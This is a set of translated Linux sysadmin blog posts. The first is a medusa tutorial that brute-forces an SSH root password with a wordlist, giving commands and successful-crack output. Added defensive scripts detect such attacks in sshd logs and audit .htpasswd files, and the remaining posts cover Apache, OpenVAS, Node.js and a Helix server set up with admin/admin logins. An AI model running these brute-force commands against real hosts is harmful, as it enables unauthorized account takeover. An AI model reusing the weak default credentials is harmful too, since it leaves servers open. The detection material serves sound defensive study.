Rootop: Server Operations and Web Architecture

2014-03-18
Posted by Venus

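Brute-forcing SSH passwords with medusa

Kali includes a tool called medusa that can be used to crack Linux account passwords.
Usage:
Medusa [-h host|-H file] [-u username|-U file] [-p password|-P file] [-C file] -M module

For example, to crack the root password. A wordlist can be found online or written by hand; this post is only an introduction.
Create a password file with one password per line:
cat p.txt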
123
123456
password
redhat

medusa -h 192.168.1.11 -u root -P p.txt -M ssh

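A file of usernames can also be supplied with -U; -M selects the module, here ssh.

On success, medusa reports that the account was found and marks the attempt as successful.

Building and installing from source:

Download:
http://www.foofus.net/jmk/tools/medusa-2.1.1.tar.gz

Cracking SSH passwords requires the ssh module, which depends on libssh2, a C library that implements the SSH2 protocol.
http://www.libssh2.org/

Install libssh2:
[root@localhost libssh2-1.2.6]# ./configure && make && make install
Install medusa:
[root@localhost medusa-2.1.1]# ./configure && make && make install

List the supported modules: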
[root@localhost ~]# medusa -d
···

Available modules in "/usr/local/lib/medusa/modules" :
+ cvs.mod : Brute force module for CVS sessions : version 2.0
+ ftp.mod : Brute force module for FTP/FTPS sessions : version 2.1
+ http.mod : Brute force module for HTTP : version 2.0
+ imap.mod : Brute force module for IMAP sessions : version 2.0
+ mssql.mod : Brute force module for M$-SQL sessions : version 2.0
+ mysql.mod : Brute force module for MySQL sessions : version 2.0
+ nntp.mod : Brute force module for NNTP sessions : version 2.0
+ pcanywhere.mod : Brute force module for PcAnywhere sessions : version 2.0
+ pop3.mod : Brute force module for POP3 sessions : version 2.0
+ rexec.mod : Brute force module for REXEC sessions : version 2.0
+ rlogin.mod : Brute force module for RLOGIN sessions : version 2.0
+ rsh.mod : Brute force module for RSH sessions : version 2.0
+ smbnt.mod : Brute force module for SMB (LM/NTLM/LMv2/NTLMv2) sessions : version 2.0
+ smtp-vrfy.mod : Brute force module for enumerating accounts via SMTP VRFY : version 2.0
+ smtp.mod : Brute force module for SMTP Authentication with TLS : version 2.0
+ snmp.mod : Brute force module for SNMP Community Strings : version 2.1
+ ssh.mod : Brute force module for SSH v2 sessions : version 2.0
+ telnet.mod : Brute force module for telnet sessions : version 2.0
+ vmauthd.mod : Brute force module for the VMware Authentication Daemon : version 2.0
+ vnc.mod : Brute force module for VNC sessions : version 2.1
+ web-form.mod : Brute force module for web forms : version 2.1
+ wrapper.mod : Generic Wrapper Module : version 2.0

Running medusa with no arguments prints the supported parameters:

[root@localhost ~]# medusa -H host.txt -u root -P password.txt -M ssh
Medusa v2.1.1 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>

ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123 (1 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 321 (2 of 3 complete)
ACCOUNT CHECK: [ssh] Host: 192.168.5.12 (1 of 1, 0 complete) User: root (1 of 1, 0 complete) Password: 123123 (3 of 3 complete)
ACCOUNT FOUND: [ssh] Host: 192.168.5.12 User: root Password: 123123 [SUCCESS]

-H host list file; -h single host; -U username list file; -u single username; -P password list file; -M protocol module
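What a run like the one above leaves in the target's sshd log, as an added example that is not part of the original post: the function flags a source IP with a burst of failed passwords and records whether a login from that IP then succeeded. The log lines are constructed in the format OpenSSH writes to /var/log/secure; the function name, threshold and window are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample lines in the format sshd writes to /var/log/secure.
SAMPLE_LOG = """\
Mar 18 10:15:01 web1 sshd[4101]: Failed password for root from 192.168.1.50 port 40112 ssh2
Mar 18 10:15:02 web1 sshd[4103]: Failed password for root from 192.168.1.50 port 40114 ssh2
Mar 18 10:15:04 web1 sshd[4105]: Failed password for root from 192.168.1.50 port 40116 ssh2
Mar 18 10:15:05 web1 sshd[4107]: Accepted password for root from 192.168.1.50 port 40118 ssh2
Mar 18 10:20:31 web1 sshd[4188]: Failed password for invalid user ops from 192.168.1.77 port 51230 ssh2
Mar 18 11:02:10 web1 sshd[4302]: Accepted password for venus from 192.168.1.20 port 60222 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+")


def find_password_guessing(log_text, threshold=3, window=timedelta(seconds=60)):
    """Return one alert per source IP with >= threshold failures inside window.
    An alert also names the user whose login from that IP succeeded mid-burst."""
    failures = defaultdict(list)  # ip -> timestamps of failures still in window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # syslog omits the year; any fixed year works for relative windows
        ts = datetime.strptime("2014 " + m["ts"], "%Y %b %d %H:%M:%S")
        ip = m["ip"]
        recent = [t for t in failures[ip] if ts - t <= window]
        if m["result"] == "Failed":
            recent.append(ts)
            failures[ip] = recent
            if len(recent) >= threshold:
                alert = alerts.setdefault(
                    ip, {"ip": ip, "failures": 0, "guessed_user": None})
                alert["failures"] = max(alert["failures"], len(recent))
        elif ip in alerts and recent:
            alerts[ip]["guessed_user"] = m["user"]
    return list(alerts.values())


if __name__ == "__main__":
    print(find_password_guessing(SAMPLE_LOG))
```

An alert with guessed_user set is the case to escalate: the password was found, not merely tried.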

2014-03-15
Posted by Venus

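Restricting directory access in Apache

When you log in to Nagios or other monitoring software, you are prompted for a username and password before you can get in. This is simply Apache restricting access to a directory,
with authentication by username and password.

For example, to restrict the /var/www/html/a directory:
1. Edit httpd.conf and add:

<Directory "/var/www/html/a">
AllowOverride AuthConfig
</Directory>

2. Create the password file and add the user venus: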

[root@centos-6.5-x64 ~]#htpasswd -c /var/www/html/a/.htpasswd venus
New password:
Re-type new password:
Adding password for user venus

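-c creates the file and is only needed when .htpasswd does not exist yet; -D deletes a user. See man htpasswd for details.

3. Create the .htaccess file:

[root@centos-6.5-x64 ~]#cat /var/www/html/a/.htaccess

AuthName "please input your username ang password!"
AuthType Basic
AuthUserFile /var/www/html/a/.htpasswd
Require valid-user

AuthName: the prompt text shown to the user
AuthType: only Basic and Digest (rarely used) are currently implemented.
These two modules normally need to be used together with at least one authentication provider module (such as mod_authn_file) and one authorization module (such as mod_authz_user).
AuthUserFile: path to the password file
Require: any valid user

Restart Apache and test.
Visiting http://192.168.1.102/a should bring up the username and password prompt.

See also:

Restricting access by IP: https://www.rootop.org/pages/963.html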
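A check over the two files created in this post, as an added example that is not part of the original: it reports an AuthUserFile that sits inside the document tree, which the mod_authn_file documentation advises against, and password entries stored with crypt() or unsalted SHA-1. The function names, the /var/www/html document root and the sample hash strings are assumptions made for the example.

```python
import posixpath
import re

# Constructed sample files; the hash strings only have the right shape.
HTACCESS = '''AuthName "please input your username ang password!"
AuthType Basic
AuthUserFile /var/www/html/a/.htpasswd
Require valid-user
'''
HTPASSWD = '''venus:Zx9kPq1LmN0aB
nagios:$apr1$Qw3rTy12$abcdefghijklmnopqrstu.
backup:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
'''

# (pattern, label, flagged) for the entry formats htpasswd can write
SCHEMES = [
    (re.compile(r"^\$2[aby]\$"), "bcrypt", False),
    (re.compile(r"^\$apr1\$"), "apr1-md5", False),
    (re.compile(r"^\{SHA\}"), "unsalted-sha1", True),
    # traditional crypt(): 13 characters, only the first 8 password chars count
    (re.compile(r"^[./0-9A-Za-z]{13}$"), "des-crypt", True),
]


def classify(hash_field):
    """Return (label, flagged) for the hash part of one htpasswd entry."""
    for pattern, label, flagged in SCHEMES:
        if pattern.search(hash_field):
            return label, flagged
    return "unknown-or-plaintext", True


def audit(htaccess_text, htpasswd_text, docroot="/var/www/html"):
    """Return a sorted list of findings for one protected directory."""
    findings = []
    m = re.search(r'^\s*AuthUserFile\s+"?([^"\n]+)"?', htaccess_text, re.M | re.I)
    if m:
        path = posixpath.normpath(m.group(1).strip())
        if path.startswith(docroot.rstrip("/") + "/"):
            findings.append("password file is inside the document root: " + path)
    for line in htpasswd_text.splitlines():
        user, sep, hash_field = line.partition(":")
        if not sep or line.startswith("#"):
            continue
        label, flagged = classify(hash_field.strip())
        if flagged:
            findings.append("%s uses %s" % (user, label))
    return sorted(findings)
```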

2014-03-12
Posted by Venus

ERROR: The number of NVTs in the OpenVAS Manager database is too low.

After installing OpenVAS, logging in to the web interface fails with:
Login failed: OMP Service is down.

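The official site, http://www.openvas.org/setup-and-start.html, provides a script that checks the state of an OpenVAS installation; download and run it. The official description is as follows: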

The OpenVAS developers provide a handy tool called openvas-check-setup to check the state of your OpenVAS installation. To use this tool simply follow these three steps:

1. Download the latest version of openvas-check-setup.
2. Ensure that the script is executable:
   chmod +x openvas-check-setup
3. Execute the script:
   ./openvas-check-setup
   for current stable release or
   ./openvas-check-setup [ --v4 | --v5 | --v6 | … ]
   for other respective OpenVAS releases.
openvas-check-setup will now analyze the state of your OpenVAS installation and propose fixes should it detect any errors or misconfigurations. It will also check if all required OpenVAS services are running and listening on the correct ports.

In case the hints did not help you to get a working OpenVAS installation, please report the problem to us and we will update/fix openvas-check-setup: OpenVAS Users Mailing List.

If you want to install the OpenVAS services on a server and you do not need clients like OpenVAS CLI or GSD in your installation you can skip the checks for these modules by starting openvas-check-setup with the --server parameter instead:

./openvas-check-setup [--server]

[root@centos-6.5-x64 ~]# wget -c https://svn.wald.intevation.org/svn/openvas/trunk/tools/openvas-check-setup --no-check-certificate
[root@centos-6.5-x64 ~]# ./openvas-check-setup --server

openvas-check-setup 2.2.3
Test completeness and readiness of OpenVAS-6
(add '--v4', '--v5' or '--v7'
if you want to check for another OpenVAS version)

Please report us any non-detected problems and
help us to improve this check routine:
http://lists.wald.intevation.org/mailman/listinfo/openvas-discuss

Send us the log-file (/tmp/openvas-check-setup.log) to help analyze the problem.

Step 1: Checking OpenVAS Scanner …
OK: OpenVAS Scanner is present in version 3.4.1.
OK: OpenVAS Scanner CA Certificate is present as /var/lib/openvas/CA/cacert.pem.
OK: NVT collection in /var/lib/openvas/plugins contains 34309 NVTs.
WARNING: Signature checking of NVTs is not enabled in OpenVAS Scanner.
SUGGEST: Enable signature checking (see http://www.openvas.org/trusted-nvts.html).
OK: The NVT cache in /var/cache/openvas contains 34309 files for 34309 NVTs.
Step 2: Checking OpenVAS Manager …
OK: OpenVAS Manager is present in version 4.0.5.
OK: OpenVAS Manager client certificate is present as /var/lib/openvas/CA/clientcert.pem.
OK: OpenVAS Manager database found in /var/lib/openvas/mgr/tasks.db.
OK: Access rights for the OpenVAS Manager database are correct.
OK: sqlite3 found, extended checks of the OpenVAS Manager installation enabled.
OK: OpenVAS Manager database is at revision 74.
OK: OpenVAS Manager expects database at revision 74.
OK: Database schema is up to date.
ERROR: The number of NVTs in the OpenVAS Manager database is too low.
FIX: Make sure OpenVAS Scanner is running with an up-to-date NVT collection and run 'openvasmd --rebuild'.

ERROR: Your OpenVAS-6 installation is not yet complete!

Fix: run the following commands in order:

[root@centos-6.5-x64 ~]# openvassd
[root@centos-6.5-x64 ~]# mkdir -p /usr/local/var/lib/openvas/mgr
[root@centos-6.5-x64 ~]# touch /usr/local/var/lib/openvas/mgr/tasks.db
[root@centos-6.5-x64 ~]# openvasmd --backup
[root@centos-6.5-x64 ~]# openvasmd --rebuild
[root@centos-6.5-x64 ~]# openvasad -c 'add_user' -u openvasadmin -r Admin
[root@centos-6.5-x64 ~]# openvasmd -p 9390 -a 127.0.0.1
[root@centos-6.5-x64 ~]# openvasad -a 127.0.0.1 -p 9393
[root@centos-6.5-x64 ~]# gsad --http-only --listen=127.0.0.1 -p 9392

Reference from a foreign author: http://pentestit.de/openvas-auf-backtrack-5-r1-installieren/

2014-03-11
Posted by Venus

Setting up a Node.js environment on Linux

Node.js official site: http://nodejs.org/

What Node.js is for:
Node.js is a platform built on Chrome’s JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices.


Download the current latest version: http://nodejs.org/dist/v0.10.26/node-v0.10.26.tar.gz
[root@localhost tar_gz]# wget -c http://nodejs.org/dist/v0.10.26/node-v0.10.26.tar.gz
[root@localhost tar_gz]# tar zxvf node-v0.10.26.tar.gz
[root@localhost tar_gz]# cd node-v0.10.26
[root@localhost node-v0.10.26]# yum install gcc gcc-c++

[root@localhost node-v0.10.26]# ./configure --prefix=/usr/local/nodejs   # run ./configure -help to see the supported build options
[root@localhost node-v0.10.26]# make
[root@localhost node-v0.10.26]# make install

[root@localhost ~]# /usr/local/nodejs/bin/node -v
v0.10.26

Test:
[root@localhost ~]# ln -s /usr/local/nodejs/bin/node /usr/bin/node
[root@localhost ~]# cat test.js   # create the test file
console.log('Hello World.');

[root@localhost ~]# node test.js
Hello World.

2014-03-11
Posted by Venus

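Setting up a Helix streaming media server

I will skip the background; you can search Baidu for material on the protocols, implementation and features. This post covers the Helix installation process.
Helix is a RealNetworks product. Official site: www.realnetworks.com

Download Helix:
http://helixproducts.real.com/hmdp/software/helixserver/151/mbrs-151-GA-linux-rhel6-64.zip
http://helixproducts.real.com/hmdp/software/helixserver/151/mbrs-151-GA-linux-rhel5-64.zip
These are the latest versions on the official site. Install the rhel6 package on Red Hat 6 or CentOS 6, and the rhel5 package on Red Hat 5 or CentOS 5.
The software is commercial but can be evaluated for 30 days. After you submit your details on the official site, the license information is e-mailed to you to download.

Environment: CentOS 6.5 64-bit, iptables disabled

[root@localhost ~]# chmod 755 servinst_mobile_linux-rhel6-x86_64.bin   # add execute permission
[root@localhost ~]# ./servinst_mobile_linux-rhel6-x86_64.bin   # start the installation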
Extracting files for Helix installation……

Welcome to the Helix Universal Media Server (RealNetworks) (15.1.0.393) Setup for UNIX
Setup will help you get Helix Universal Media Server running on your computer.
Press [Enter] to continue… //confirm to start the installation

If a Helix Universal Media Server license key file has been sent to you,
please enter its directory path below. If you have not
received a Helix Universal Media Server license key file, then this server
WILL NOT OPERATE until a license key file is placed in
the server’s License directory. Please obtain a free
Basic Helix Universal Media Server license or purchase a commercial license
from our website at http://www.realnetworks.com/helix/. If you need
further assistance, please visit our on-line support area
at http://www.realnetworks.com/helix/streaming-media-support/.

MachineID: e273-990d-c0b5-9a5f-8be8-abaf-f129-6476

License Key File: []: /root/RNKey-Helix_Universal_Server_10-Stream-nullnull-39545068825149354.lic
Enter the path to the .lic license file here; it must be the full path!

Installation and use of Helix Universal Media Server requires
acceptance of the following terms and conditions:
Press [Enter] to display the license text… //display the license text

Choose "Accept" to accept the terms of this
license agreement and continue with Helix Universal Media Server setup.
If you do not accept these terms, enter "No"
and installation of Helix Universal Media Server will be cancelled.
I accept the above license: [Accept]:
Press Enter to continue.

Enter the complete path to the directory where you want
Helix Universal Media Server to be installed. You must specify the full
pathname of the directory and have write privileges to
the chosen directory.
Directory: [/root]:/usr/local/helix       //installation path; here I install to /usr/local/helix

Please enter a username and password that you will use
to access the web-based Helix Universal Media Server Administrator and monitor.
Username []:   //the user for managing Helix through the web interface; the password is set in the next step. Here both the username and the password are admin

Please enter SSL/TLS configuration information.

Country Name (2 letter code) [US]: CN     //country code
State or Province Name (full name) [My State]: China    //state or province
Locality Name (e.g., city) [My Locality]: QingDao
Organization Name (e.g., company) [My Company]: Rootop
Organizational Unit Name (e.g., section) [My Department]: IT
Common Name (e.g., hostname) [My Name]: venus
Email Address [myname@mailhost]: venus@rootop.org
Certificate Request Optional Name []: certificate  //I made this value up; I don't know what belongs here

Helix Universal Media Server will listen for Administrator requests on the
port shown. This port has been initialized to a random value
for security. Please verify now that this pre-assigned port
will not interfere with ports already in use on your system;
you can change it if necessary. These connections have URLs
that begin with "http://"

Port [15112]:     //press Enter to accept the default; the port appears to be random and can be set manually (HTTP)

Helix Universal Media Server will also listen for HTTPS Administrator
requests on the port shown. This port has been initialized to
a random value for security. Please verify now that this
pre-assigned port will not interfere with ports already in
use on your system; you can change it if necessary. These
connections have URLs that begin with "https://"

Port [25780]:       //port for encrypted HTTPS connections

You have selected the following Helix Universal Media Server configuration:

Install Location: /usr/local/helix
Encoder User/Password: admin/****
Monitor Password: ****
Admin User/Password: admin/****
Admin Port: 15112
Secure Admin Port: 25780
RTSP Port: 554
RTMP Port: 1935
HTTP Port: 80
HTTPS Port: 443
RTSP Fast Channel Switching API Port: 8008
Server Side Playlist API Port: 8009
Content Mgmt Port: 8010
Control Port Security: Disabled

Enter [F]inish to begin copying files, or [P]revious to
revise the above settings: [F]: F        //enter F to confirm the settings and start the installation

Generating SSL/TLS Key file…
Running: 'OPENSSL_CONF=openssl.cnf Bin/openssl genrsa -out Certificates/key.pem 2048'
Generating RSA private key, 2048 bit long modulus
………..+++
……………….+++
e is 65537 (0x10001)

Generating SSL/TLS Cert file…
Running: 'OPENSSL_CONF=openssl.cnf Bin/openssl req -new -x509 -key Certificates/key.pem -out Certificates/cert.pem -days 1000 -batch'

Generating SSL/TLS CSR file…
Running: 'OPENSSL_CONF=openssl.cnf Bin/openssl req -new -key Certificates/key.pem -out Certificates/key.csr -batch'

Copying Helix Universal Media Server files…..
Helix Universal Media Server installation is complete.

RealNetworks recommends increasing the default file descriptor
limits prior to using your Helix Universal Media Server or Proxy. Please
refer to the Installation Chapter of the Helix Systems Integration
Guide for more information on setting File Descriptor limits,
and recommended settings for your system.

If at any time you should require technical
assistance, please visit our on-line support area
at http://www.realnetworks.com/helix/streaming-media-support/.

Cleaning up installation files…
Done.

[root@localhost ~]#

Installation complete.

Start the service:
[root@localhost ~]# /usr/local/helix/Bin/rmserver /usr/local/helix/rmserver.cfg &
rmserver.cfg is the Helix configuration file; it contains the port settings, among other things.
Starting TID 140478784730848, procnum 3 (rmplug)
Loading Helix Server License Files…
Starting TID 140478621152992, procnum 4 (rmplug)
Starting TID 140478613812960, procnum 5 (rmplug)
Starting TID 140478606472928, procnum 6 (rmplug)
Starting TID 140478599132896, procnum 7 (rmplug)
Starting TID 140478591792864, procnum 8 (rmplug)
Starting TID 140478241568480, procnum 9 (rmplug)
Starting TID 140478584452832, procnum 10 (rmplug)
Starting TID 140478234228448, procnum 11 (rmplug)
Starting TID 140478226888416, procnum 12 (rmplug)
Starting TID 140478219548384, procnum 13 (rmplug)
Starting TID 140478212208352, procnum 14 (rmplug)
Starting TID 140478204868320, procnum 15 (rmplug)
Starting TID 140478197528288, procnum 16 (rmplug)
Starting TID 140478190188256, procnum 17 (rmplug)
Starting TID 140478182848224, procnum 18 (rmplug)
Starting TID 140478180751072, procnum 19 (rmplug)
Starting TID 140477631297248, procnum 20 (rmplug)
Starting TID 140477623957216, procnum 21 (rmplug)
Starting TID 140477616617184, procnum 22 (rmplug)
Starting TID 140477609277152, procnum 23 (rmplug)
Starting TID 140477601937120, procnum 24 (rmplug)
Starting TID 140477594597088, procnum 25 (rmplug)
Starting TID 140477587257056, procnum 26 (rmplug)
Starting TID 140477579917024, procnum 27 (rmplug)
Starting TID 140477572576992, procnum 28 (rmplug)
Starting TID 140477565236960, procnum 29 (memreap)
Starting TID 140477557896928, procnum 30 (streamer)
Starting TID 140477550556896, procnum 31 (streamer)
Server has started 2 Streamers…

Version: Helix Universal Media Server (RealNetworks) (15.1.0.393) (Build 10096/377)

Output like this means the service started successfully.

Check that the configured ports are listening:
[root@localhost ~]# lsof -i:15112
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rmserver. 5779 root 17u IPv6 214708 0t0 TCP *:15112 (LISTEN)
[root@localhost ~]# lsof -i:25780
COMMAND PID USER FD TYPE DEVICE SIZE/OFF NODE NAME
rmserver. 5779 root 18u IPv6 214710 0t0 TCP *:25780 (LISTEN)

Now log in to the admin interface and create a video library:
Plain HTTP connection:
http://192.168.1.105:15112/admin/index.html
admin
admin

HTTPS connection:
https://192.168.1.105:25780/admin/index.html
admin
admin

First place an RMVB video under /mnt/films; the path is up to you, it is simply where the videos are stored.
[root@localhost ~]# ll /mnt/films/2.rmvb
-rw-r--r-- 1 root root 526756127 3月 11 18:12 /mnt/films/2.rmvb

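After logging in, the interface looks like this:

Click Server Setup > Mount Points, then click the + sign to create a new "mount point".
Edit Description //description text
Mount Point //the directory used in the URL when browsing
Base Path //physical path to the videos

Click Apply; you are prompted to restart the service, so click Reset Server. Back in the shell you can see the server restarting.

Test:
Download RealPlayer and open the address:
rtsp://192.168.1.105/films/2.rmvb

Supported formats that I know of:
3gp rmvb wmv

If iptables is enabled, the ports shown in the admin panel need to be allowed through.

This completes the basic setup.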